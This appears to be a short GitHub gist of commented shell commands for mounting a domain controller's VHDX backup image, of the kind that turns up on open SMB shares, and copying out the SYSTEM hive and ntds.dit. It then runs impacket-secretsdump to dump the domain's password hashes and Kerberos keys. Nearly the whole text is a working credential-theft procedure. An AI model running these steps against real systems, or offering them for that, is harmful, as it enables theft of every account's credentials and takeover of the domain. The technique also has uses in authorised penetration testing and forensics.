@zimnyaa
Created January 19, 2022 12:02
Unpack .vhdx and decrypt ntds.dit (VHDX images are often used for DC backups and turn up on open SMB shares)
# runs on kali out-of-the-box (qemu-utils, ntfs-3g and impacket are preinstalled)
# this is not a ready-made script, more like a collection of commands
# QEMU: expose the VHDX as a block device, read-only since we only copy files out of it
modprobe nbd max_part=16
qemu-nbd -r -c /dev/nbd0 filename.vhdx
# find the Windows partition: the big NTFS one. On a BIOS/MBR disk it is usually p2
# (p1 is "System Reserved"); on a UEFI/GPT disk it is usually p3 (p1 EFI, p2 MSR)
fdisk -l /dev/nbd0
# mount that partition read-only (replace p2 with whatever fdisk showed)
mkdir -p /mnt/windows
mount -o ro /dev/nbd0p2 /mnt/windows
# copy SYSTEM (holds the bootkey, which unwraps the PEK that encrypts the hashes) and NTDS.dit
cp /mnt/windows/Windows/System32/config/SYSTEM ~/SYSTEM
cp /mnt/windows/Windows/System32/NTDS/ntds.dit ~/ntds.dit
cd
# do not bother with esedbexport, impacket can do everything for us
# LOCAL = parse the files on disk; -hashes is only for authenticating to a remote target, so leave it out
# secretsdump appends its own suffixes: output lands in hashes.ntds (plus .ntds.kerberos / .ntds.cleartext if present)
impacket-secretsdump -ntds ~/ntds.dit -system ~/SYSTEM LOCAL -outfile hashes
# cleanup: unmount and detach the image
umount /mnt/windows
qemu-nbd -d /dev/nbd0